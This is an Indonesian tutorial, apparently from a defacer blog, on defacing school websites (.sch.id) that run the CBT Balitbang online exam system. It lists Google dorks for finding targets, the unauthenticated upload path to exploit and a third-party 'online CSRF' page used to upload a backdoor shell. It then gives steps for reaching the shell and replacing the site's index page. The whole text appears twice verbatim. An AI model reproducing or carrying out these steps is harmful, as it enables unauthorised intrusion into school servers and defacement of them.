Home 
Deface Poc CBT Balitbang 
Upload Shell Dan Tebas Index 
Tools Termux Deface Poc CBT Balitbang
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer.
oke ini dia tutornya :
[¤]Deface metode CBT BALITBANG website target sch.id atau web sekolah
Bahan-bahan yang di perlukan yaitu :
-hp / pc
-Internet lancar
-Shell backdoor atau mini shell
-script deface
-dork
Dork nya sudah saya sediakan dibawah ini :
-inurl:/login.php
-inurl:/cbt
-inurl:/login.php intitle:ujian online
-inurl:/login.php intitle:cbt beesmart
*ini dork andalan gua tapi lu kembangin lagi dorknya su* :
~ inurl:/panel/pages/login.php site:.sch.id
Dan ini Exploitnya :
/panel/pages/upload.php
Dan untuk Crsf onlinenya banyak kok di google dan ini salah satu Crsf yang sering saya pakai :
http://bambumasa.com/mBem-CSRF.php
Oke step by step :
1.pastikan kamu pilih salah satu dork di atas terus kamu pilih yg mana kira-kira yang vuln (web vuln di tandai ketika kita memasukan exploit dibelakang site target tersebut maka tampilannya akan blank putih)
2.contoh cara masukin exploitnya :
sebelum di kasih exploit = Www.site.sch.id/[patch]/login.php
Menjadi :
Sesudah di kasih EXPLOIT = www.site.sch.id/[patch]/panel/pages/upload-file.php
Note :[patch] itu tergantung webnya kadang di suatu web ada tambahan exploit standarnya atau emang sudah ada dari dulu di situ jadi pas kita buka ada tambahan seperti /js seperti itu jangan di hapus (abaikan saja nih patchnya jarang kok web yang punya patch)
3.lanjut sesudah kamu pilih target dan masukin exploitnya dan ternyata vuln atau blank putih tinggal kamu masukkan ke csrf online dehh yg kamu udah pilih (link csrf online di atas )
4.lanjut ketika masuk ke csrf online di situ ada 2 kolom atau tabel yang harus kamu isi dengan web target+exploitnya(di kolom 1) terus di kolom bawahnya atau di kolom 2 lu isi dengan "uploadfile" terus kamu pencet "kunci target" nanti akan ada "chose file" tinggal kamu pilih shell yang mau tebas index buat yg baik bisa upload script doang kok
5.TERUS GIMANA CARA AKSES SHELL NYA ?Saya kasih contoh tambahkan /images/namashellmu.php ATAU /picture/namashellmu.php
di belakang url target
oke ini dia tutornya :
[¤]Deface metode CBT BALITBANG website target sch.id atau web sekolah
Bahan-bahan yang di perlukan yaitu :
-hp / pc
-Internet lancar
-Shell backdoor atau mini shell
-script deface
-dork
Dork nya sudah saya sediakan dibawah ini :
-inurl:/login.php
-inurl:/cbt
-inurl:/login.php intitle:ujian online
-inurl:/login.php intitle:cbt beesmart
*ini dork andalan gua tapi lu kembangin lagi dorknya su* :
~ inurl:/panel/pages/login.php site:.sch.id
Dan ini Exploitnya :
/panel/pages/upload.php
Dan untuk Crsf onlinenya banyak kok di google dan ini salah satu Crsf yang sering saya pakai :
http://bambumasa.com/mBem-CSRF.php
Oke step by step :
1.pastikan kamu pilih salah satu dork di atas terus kamu pilih yg mana kira-kira yang vuln (web vuln di tandai ketika kita memasukan exploit dibelakang site target tersebut maka tampilannya akan blank putih)
2.contoh cara masukin exploitnya :
sebelum di kasih exploit = Www.site.sch.id/[patch]/login.php
Menjadi :
Sesudah di kasih EXPLOIT = www.site.sch.id/[patch]/panel/pages/upload-file.php
Note :[patch] itu tergantung webnya kadang di suatu web ada tambahan exploit standarnya atau emang sudah ada dari dulu di situ jadi pas kita buka ada tambahan seperti /js seperti itu jangan di hapus (abaikan saja nih patchnya jarang kok web yang punya patch)
3.lanjut sesudah kamu pilih target dan masukin exploitnya dan ternyata vuln atau blank putih tinggal kamu masukkan ke csrf online dehh yg kamu udah pilih (link csrf online di atas )
4.lanjut ketika masuk ke csrf online di situ ada 2 kolom atau tabel yang harus kamu isi dengan web target+exploitnya(di kolom 1) terus di kolom bawahnya atau di kolom 2 lu isi dengan "uploadfile" terus kamu pencet "kunci target" nanti akan ada "chose file" tinggal kamu pilih shell yang mau tebas index buat yg baik bisa upload script doang kok
5.TERUS GIMANA CARA AKSES SHELL NYA ?Saya kasih contoh tambahkan /images/namashellmu.php ATAU /picture/namashellmu.php
di belakang url target